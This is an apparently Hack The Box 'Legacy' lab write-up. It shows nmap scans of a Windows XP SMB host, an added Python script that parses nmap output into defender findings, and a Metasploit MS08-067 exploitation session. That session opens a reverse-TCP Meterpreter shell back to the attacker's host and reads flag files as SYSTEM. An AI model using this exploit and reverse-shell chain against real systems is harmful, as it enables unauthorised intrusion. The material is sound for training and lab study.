Introduction
Legacy is a relatively easy box running SMB on Windows XP (reported by nmap as Windows 2000 LAN Manager).
We find the exploit with Metasploit and directly get access as the privileged user NT AUTHORITY\SYSTEM.
Scanning and Information Gathering
Nmap Scan
nmap -p- -T4 -min-rate=1000 -oN ports.out 10.129.227.181
# Nmap 7.80 scan initiated Fri Jun 3 15:40:41 2022 as: nmap -p- -T4 -min-rate=1000 -oN ports.out 10.129.227.181
Nmap scan report for 10.129.227.181
Host is up (0.14s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
# Nmap done at Fri Jun 3 15:42:09 2022 -- 1 IP address (1 host up) scanned in 87.81 seconds
nmap -sC -sV -v -oN nmap.out -p 135,139,445 -Pn 10.129.227.181
# Nmap 7.80 scan initiated Fri Jun 3 15:43:24 2022 as: nmap -sC -sV -v -oN nmap.out -p 135,139,445 -Pn 10.129.227.181
Nmap scan report for 10.129.227.181
Host is up (0.14s latency).
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:96:dc:06 (VMware)
| Names:
|   LEGACY<00>                    Flags: <unique><active>
|   HTB<00>                       Flags: <group><active>
|   LEGACY<20>                    Flags: <unique><active>
|   HTB<1e>                       Flags: <group><active>
|   HTB<1d>                       Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-06-08T20:41:24+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 3 15:44:35 2022 -- 1 IP address (1 host up) scanned in 71.43 seconds
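The two scans above already contain everything a defender needs to flag this host: SMB reachable on 139/445, an end-of-life OS string from smb-os-discovery, message signing disabled, and a failed SMB2 negotiation (SMBv1 only). The script below is an added example, not part of this writeup, that parses nmap's -oN normal output and turns those facts into findings. The function names are mine, and SAMPLE_SCAN is a constructed excerpt mirroring the scan above, so it runs offline.

```python
"""Triage nmap -oN output for legacy SMB exposure (added example).

Reads the plain-text format nmap writes with -oN, extracts open ports,
the smb-os-discovery OS string, smb-security-mode message_signing and
whether SMB2 negotiation failed, then maps them to defender findings.
"""
import re

# Constructed sample mirroring the Legacy scan; IP and names are illustrative.
SAMPLE_SCAN = """\
# Nmap 7.80 scan initiated Fri Jun 3 15:43:24 2022 as: nmap -sC -sV -p 135,139,445 10.129.227.181
Nmap scan report for 10.129.227.181
Host is up (0.14s latency).

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|_  System time: 2022-06-08T20:41:24+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

# Nmap done at Fri Jun 3 15:44:35 2022 -- 1 IP address (1 host up) scanned in 71.43 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap_normal(text):
    """Return one dict per host: ip, open_ports {port: (service, version)},
    smb_os, smb_signing and smb2_failed."""
    hosts = []
    cur = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = HOST_RE.match(line)
        if m:
            cur = {"ip": m.group(1), "open_ports": {}, "smb_os": None,
                   "smb_signing": None, "smb2_failed": False}
            hosts.append(cur)
            continue
        if cur is None:
            continue
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            cur["open_ports"][int(m.group(1))] = (m.group(4), m.group(5) or "")
            continue
        # NSE script lines start with "| " or "|_"; strip that prefix.
        if line.startswith("|"):
            body = line.lstrip("|_ ").strip()
            if body.startswith("OS:"):
                cur["smb_os"] = body[3:].strip()
            elif body.startswith("message_signing:"):
                cur["smb_signing"] = body.split(":", 1)[1].strip()
            elif body.startswith("smb2-time:") and "negotiation failed" in body:
                cur["smb2_failed"] = True
    return hosts


def assess_smb_exposure(host):
    """Map parsed facts to the findings a defender would act on."""
    findings = []
    if not (445 in host["open_ports"] or 139 in host["open_ports"]):
        return findings
    os_text = " ".join([host["smb_os"] or ""] +
                       [ver for _, ver in host["open_ports"].values()])
    if re.search(r"Windows (XP|2000|Server 2003)", os_text):
        findings.append("end-of-life Windows with SMB exposed: cannot be patched, "
                        "isolate or decommission")
    if host["smb_signing"] and host["smb_signing"].startswith("disabled"):
        findings.append("SMB signing disabled: enable 'Digitally sign "
                        "communications (always)' on the server")
    if host["smb2_failed"]:
        findings.append("SMB2 negotiation failed: SMBv1-only host, block "
                        "TCP 139/445 from untrusted networks")
    return findings


if __name__ == "__main__":
    for h in parse_nmap_normal(SAMPLE_SCAN):
        print(h["ip"], h["smb_os"])
        for f in assess_smb_exposure(h):
            print("  -", f)
```

Feed it the ports.out or nmap.out file produced by the scans above instead of SAMPLE_SCAN and the same three findings come out for Legacy; hosts without 139/445 open produce none.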
Exploiting
We will be using the "139,445 - Pentesting SMB" page from HackTricks [1].
Using msf [2] we search for an exploit for SMB on Windows 2000 and pick exploit/windows/smb/ms08_067_netapi, as it is listed with Rank: great and Check: Yes.
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT    445              yes       The SMB service port (TCP)
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     10.10.14.139     yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.227.181
RHOSTS => 10.129.227.181
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 10.10.14.139:4444
[*] 10.129.227.181:445 - Automatically detecting the target...
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.129.227.181
[*] Meterpreter session 3 opened (10.10.14.139:4444 -> 10.129.227.181:1036) at 2022-06-03 16:19:32 +0000
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
There are two user profiles of interest, Administrator and john:
meterpreter > ls
Listing: C:\Documents and Settings
==================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  0     dir   2017-03-16 06:07:21 +0000  Administrator
040777/rwxrwxrwx  0     dir   2017-03-16 05:29:48 +0000  All Users
040777/rwxrwxrwx  0     dir   2017-03-16 05:33:37 +0000  Default User
040777/rwxrwxrwx  0     dir   2017-03-16 05:32:52 +0000  LocalService
040777/rwxrwxrwx  0     dir   2017-03-16 05:32:43 +0000  NetworkService
040777/rwxrwxrwx  0     dir   2017-03-16 05:33:42 +0000  john
We get the user flag at C:\Documents and Settings\john\Desktop
meterpreter > pwd
C:\Documents and Settings\john\Desktop
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:19:49 +0000  user.txt
meterpreter > cat user.txt
e69a███████████████████████7644f
And the Administrator flag at C:\Documents and Settings\Administrator\Desktop
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:18:50 +0000  root.txt
meterpreter > cat root.txt
9934███████████████████████d5713